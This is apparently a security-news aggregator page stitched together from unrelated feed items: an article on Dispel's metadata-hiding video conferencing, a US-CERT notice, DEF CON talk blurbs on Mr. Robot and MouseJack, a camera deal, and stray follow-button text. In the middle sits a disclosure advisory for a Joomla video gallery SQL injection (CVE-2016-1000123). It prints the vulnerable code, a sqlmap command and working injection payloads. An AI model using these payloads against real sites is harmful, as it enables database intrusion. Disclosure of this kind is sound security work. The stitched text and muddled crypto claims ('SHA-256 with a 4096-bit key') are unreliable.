Video

Secure Video Conferencing Solution Protects Content and Metadata in Voice and Video Communication

The need for global secure voice and video communication is constantly growing. Whether it's for corporate intellectual property (IP) being shared between dispersed research centers or legal offices discussing mergers and acquisitions, both content and metadata needs to be protected from surveillance.

While the content of video conference sessions is relatively easy to protect with encryption, the metadata remains visible to hackers, governments and agencies.

Metadata (source, destination, timing, location etcetera), and especially patterns of metadata, can provide strong inferences over content.

Dispel, a U.S. company formed in 2014 and based in New York, has launched what it calls 'the first commercially available counter-reconnaissance voice and video system' that 'renders live-stream communications impenetrable to metadata-driven surveillance and hacking.'

Dispel, the company told SecurityWeek, takes a new approach to security. Traditionally, companies defend their networks by building bigger and stronger walls; but this approach leaves attackers with a huge advantage: they have time to locate unknown weaknesses. Dispel's approach is to hide the network and make it transient

"Enterprises and professionals," says Scott Crawford, research director of information security at 451 Research, "particularly those stationed in insecure regions and locales, require a secure communications platform that can be trusted, and free-from-surveillance voice and video communication tools for their business needs."

Metadata is the weak point. Many countries allow their agencies unrestricted access to communications metadata. "Parallel with the increased use of encryption, big data analysis and behavioral inference have become the techniques of choice for technically sophisticated parties attempting to decipher what companies, governments, and persons of interest are communicating, as well as where their assets are located," comments Ethan Schmertzler, CEO of Dispel.

Dispel promises complete security of communication by first providing the videoconferencing software, and then protecting the content and hiding or neutralizing the metadata. The content of the communication is protected by a combination of SHA-256 with a 4096-bit key, and 2048-bit RSA key. The metadata is hidden, or dispersed, with a scattergrid approach similar but superior to that used by TOR. Very simply, Dispel bounces the communications between randomly raised VM machines in and between different cloud providers. These are currently Amazon, Azure (soon), DigitalOcean, Rackspace, SoftLayer and Vultr.

However, the user is able to control that data through the software console, thus never losing its chain of custody. The entire Dispel infrastructure remains under the licensed control of the user, and regulatory compliance can be controlled through geographic specifications. For example, US defense companies could insist that the communications remain within the US; European health or pharmaceutical companies could insist that data remains within the European Union. The user is able to specify the use of the cloud providers and which of their data centers to employ, or leave the system to randomly choose the route from location to destination.

The process leaves no forensic footprint. Firstly, the network (or route) cannot be predicted by an adversary, and secondly it is automatically dismantled on completion. The resources used are subsequently re-provisioned by the cloud provider to other unassociated cloud users.

Two of the major weaknesses of the TOR approach to security and anonymity are also eliminated. Monitoring and timing entry points and exit points is impossible -- this is just like any other encrypted traffic entering and leaving a general purpose cloud provider. Furthermore, the inherently low speeds of TOR are replaced by enterprise quality high speed cloud communication.

Dispel requires no local agent. It is operated entirely through the browser and is currently supported by Chrome, Firefox, Vivaldi, and Opera on macOS, Windows, Linux, and Android. This makes it particularly easy to use, and suitable for anything from high-powered financial circles to a publisher communicating with a single journalist in a sensitive region.

view counter

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

Tags:


SecurityWeek RSS Feed

Original release date: September 22, 2016

The Federal Trade Commission (FTC) has released a step-by-step video to users whose personal information may have been exposed in a data breach. This video provides instruction on how to report an incident and develop a personal recovery plan after a data breach has occurred.

US-CERT encourages users to review the FTC blog and US-CERT Tips on Avoiding Social Engineering and Phishing Attacks, Safeguarding Your Data, and Protecting Your Privacy for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

Was this document helpful?  Yes  |  Somewhat  |  No


US-CERT Current Activity

Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.

Vulnerable Code in : ajax_url.php

11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
28 if($ _POST['task']=="load_videos_content")
29
30 $ page = 1;
31
32
33 if(!empty($ _POST["page"]) && is_numeric($ _POST['page']) && $ _POST['page']>0){
34 $ paramssld='';
35 $ db5 = JFactory::getDBO();
36 $ query5 = $ db->getQuery(true);
37 $ query5->select('*');
38 $ query5->from('#__huge_it_videogallery_params');
39 $ db->setQuery($ query5);
40 $ options_params = $ db5->loadObjectList();
41 foreach ($ options_params as $ rowpar) {
42 $ key = $ rowpar->name;
43 $ value = $ rowpar->value;
44 $ paramssld[$ key] = $ value;
45
46 $ page = $ _POST["page"];
47 $ num=$ _POST['perpage'];
48 $ start = $ page * $ num - $ num;
49 $ idofgallery=$ _POST['galleryid'];
50
51 $ query = $ db->getQuery(true);
52 $ query->select('*');
53 $ query->from('#__huge_it_videogallery_videos');
54 $ query->where('videogallery_id ='.$ idofgallery);
55 $ query ->order('#__huge_it_videogallery_videos.ordering asc');
56 $ db->setQuery($ query,$ start,$ num);

CVE-2016-1000123
Exploit Code:
aC/ $ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
aC/ .
aC/ .
aC/ .
aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
aC/ ---
aC/ Parameter: #1* ((custom) POST)
aC/ Type: error-based
aC/ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
aC/ Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
aC/
aC/ Type: AND/OR time-based blind
aC/ Title: MySQL >= 5.0.12 time-based blind - Parameter replace
aC/ Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
aC/ ---
aC/ [19:36:55] [INFO] the back-end DBMS is MySQL
aC/ web server operating system: Linux Debian 8.0 (jessie)
aC/ web application technology: Apache 2.4.10
aC/ back-end DBMS: MySQL >= 5.0.12
aC/ [19:36:55] [WARNING] HTTP error codes detected during run:
aC/ 500 (Internal Server Error) - 2714 times
aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
aC/
aC/ [*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169


Exploit Files ≈ Packet Storm

MR. ROBOT is a rare treat - a network television show whose hacker protagonist is a fully realized character with a realistically attainable set of skills. No hyper-typing, no gibberish masquerading as tech jargon, no McGuffins to magically paper over plot holes with hacker dust. MR. ROBOT takes the tech as seriously as the drama.

One of the main reasons for this verisimilitude is the work of Kor Adana, MR. ROBOT's advisor on all things hackish. His fingerprints are on every terminal window in the show. Another advisor to the show is our very own CJunky - known to the outside world as hacker and raconteur Marc Rogers. Join Dark Tangent for a panel discussion of MR. ROBOT: the phenomenon, the hacks and the crazy ways the show seems to pull its storylines from the future. Bring your questions, and keep an eye out for late-breaking special guests.

Kor Adana’s interest in technology started as a child when he tried to build a red box to get free calls on pay phones. By the time he was in middle school, he was building his own computer systems and getting into trouble. After obtaining a B.S. in IT Network Administration, Kor went on to work in enterprise network security for one of the world’s largest automakers. He performed penetration testing, designed security policies, managed enterprise-wide eDiscovery, and conducted forensics for legal and HR matters. While there, he also worked alongside NASA in a high-profile government investigation. He eventually left the IT world to pursue his true passion, writing for film and television. He’s worked with the producers of THE WALKING DEAD, THE SHIELD, LOST, and DEXTER. He is currently a writer and technical supervisor for USA's Golden Globe Award-winning drama, MR. ROBOT. He also has one of his own projects in development with Universal Cable Productions.

Ryan Kazanciyan is the Chief Security Architect for Tanium and has thirteen years of experience in incident response and forensics, penetration testing, and security architecture. Prior to joining Tanium, Ryan was a technical director and lead investigator at Mandiant, where he worked with dozens of Fortune 500 organizations impacted by targeted attacks.

Ryan has presented security research at dozens of events worldwide, including Black Hat, DEFCON, and RSA. He has led training sessions for hundreds of the FBI's cyber squad agents, and was a contributing author for "Incident Response and Computer Forensics, 3rd Edition", published in 2014.

Andre McGregor is at DEFCON 24 celebrating his one-year anniversary as Tanium’s Director of Security responsible for internal cybersecurity. Prior to joining Tanium, Andre was a fresh-faced new agent with the FBI working cases like the NYC Subway bomber and Times Square car bomb while arresting his share of Italian Organized Crime bosses. His computer engineering background led him to help form FBI New York’s first cyber national security squad focused on computer intrusions from China, Russia, and Iran. Having deploying with NSA Blue Team and DHS US-CERT/ICS-CERT as a technically-trained cyber agent, Andre has led numerous large-scale cyber investigations ranging from financial crimes to critical infrastructure protection. In his free time, when he wasn’t sifting through terabytes of Netflow with SiLK and playing around with Autopsy and IDA, Andre was an FBI firearms instructor, dive team medic, and a volunteer firefighter driving fire trucks. After graduating from Brown University, Andre worked as an engineer at Goldman Sachs and later transitioned to IT Director at Cardinal Health/Advogent. Having shed the badge and gun last year, Andre currently serves as the FBI cyber technical consultant for the TV show Mr. Robot.

Kim Zetter is an award-winning, senior staff reporter at Wired covering cybercrime, privacy, and security. She is writing a book about Stuxnet, a digital weapon that was designed to sabotage Iran's nuclear program.


DEF CON Announcements!

What if your wireless mouse was an effective attack vector? Research reveals this to be the case for mice from Logitech, Microsoft, Dell, Lenovo, Hewlett-Packard, Gigabyte, and Amazon. Dubbed 'MouseJack', this class of security vulnerabilities allows keystroke injection into non-Bluetooth wireless mice. Imagine you are catching up on some work at the airport, and you reach into your laptop bag to pull out your phone charger. As you glance back at your screen, you see the tail end of an ASCII art progress bar followed by your shell history getting cleared.

Before you realize what has happened, an attacker has already installed malware on your laptop. Or maybe they just exfiltrated a git repository and your SSH keys. In the time it took you to plug in your phone, you got MouseJacked. The attacker is camped out at the other end of the terminal, equipped with a commodity USB radio dongle and a directional patch antenna hidden in a backpack, and boards her plane as soon as the deed is done. The reality of MouseJack is that an attacker can inject keystrokes into your wireless mouse dongle from over 200 meters away, at a rate of up to 7500 keystrokes per minute (one every 8ms).

Most wireless keyboards encrypt the data going between the keyboard and computer in order to deter sniffing, but wireless mouse traffic is generally unencrypted. The result is that wireless mice and keyboards ship with USB dongles that can support both encrypted and unencrypted RF packets. A series of implementation flaws makes it possible for an attacker to inject keystrokes directly into a victim's USB dongle using easily accessible, cheap hardware, in most cases only requiring that the user has a wireless mouse. The majority of affected USB dongles are unpatchable, making it likely that vulnerable computers will be common in the wild for the foreseeable future.

This talk will explain the research process that lead to the discovery of these vulnerabilities, covering specific tools and techniques. Results of the research will be detailed, including protocol behavior, packet formats, and technical specifics of each vulnerability. Additional vulnerabilities affecting 14 vendors are currently in disclosure, and will be revealed during this talk.

Marc is a security researcher and software engineer at Bastille Networks, where he focuses on RF/IoT threats present in enterprise environments. He has been hacking on software defined radios since 2013, when he competed as a finalist in the DARPA Spectrum Challenge. In 2011, he wrote software to reassemble shredded documents for the DARPA Shredder Challenge, finishing the competition in third place out of 9000 teams.

Twitter: @marcnewlin


DEF CON Announcements!

wifi security cam

This full-featured camera broadcasts over wifi, allowing you to view live from multiple mobile devices at once. Its footage records to micro SD where it is stored and accessible remotely as well. Remote pan/tilt/zoom, 2-way voice, motion-detection alert, and night vision capabilities are all onboard. This model averages 4 out of 5 stars on Amazon from over 4,100 people (read reviews). Amazon indicates that its typical list price of $ 200 has been reduced 50% to $ 100.

This story, "50% off Vimtag VT-361 Pan&Tilt HD WiFi Video Security Camera with Night Vision - Deal Alert" was originally published by
InfoWorld Security

Oct 7 2015   2:14PM GMT

Ken Harthun Ken Harthun Profile: Ken Harthun

Tags:

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

humor

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

Security

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

security awareness

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

Security scan

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

Security threats

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

       


Security Corner

Oct 31 2015   4:12AM GMT

Ken Harthun Ken Harthun Profile: Ken Harthun

Tags:

Thanks! We'll email you
when relevant content is
added and updated.

Following

Follow

       


Security Corner